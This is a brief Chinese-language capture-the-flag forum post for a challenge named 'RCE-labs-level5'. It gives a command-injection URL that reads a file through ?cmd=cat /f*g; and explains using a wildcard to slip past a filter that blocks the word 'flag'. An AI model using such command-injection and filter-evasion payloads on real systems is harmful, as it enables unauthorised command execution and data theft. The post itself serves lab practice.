返回
7
0

RCE-labs-level5

iiice,2026-04-18 23:49

http://80-cc2e2345-3df4-4799-bd57-5bda708321ec.challenge.ctfplus.cn/?cmd=cat /f*g;

根据代码利用get传参,因为flag字样被waf,所以使用通配符*匹配la这两个字符,找到flag,cat出来。

暂无回复。你的想法是什么?


bottom-logo1
bottom-logo2captionbottom-logo3
GeeSec
商务合作
bottom-logo4
蜀ICP备2024047787号-2